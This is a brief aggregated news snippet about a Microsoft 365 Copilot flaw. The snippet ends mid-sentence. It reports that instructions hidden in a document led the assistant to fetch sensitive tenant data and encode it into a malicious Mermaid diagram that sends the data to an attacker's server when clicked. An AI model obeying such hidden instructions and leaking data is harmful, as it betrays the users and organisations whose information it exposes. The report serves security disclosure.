A vulnerability in Microsoft 365 Copilot allowed attackers to trick the AI assistant into fetching and exfiltrating sensitive tenant data by hiding instructions in a document. The AI then encoded the data into a malicious Mermaid diagram that, when clicked, sent the stolen information to an attacker’s server. When Microsoft 365 Copilot was asked to […]
The post Microsoft 365 Copilot Flaw Lets Hackers Steal Sensitive Data via Indirect Prompt Injection appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
This article has been indexed from GBHackers Security | #1 Globally Trusted Cyber Security News Platform
Read the original article: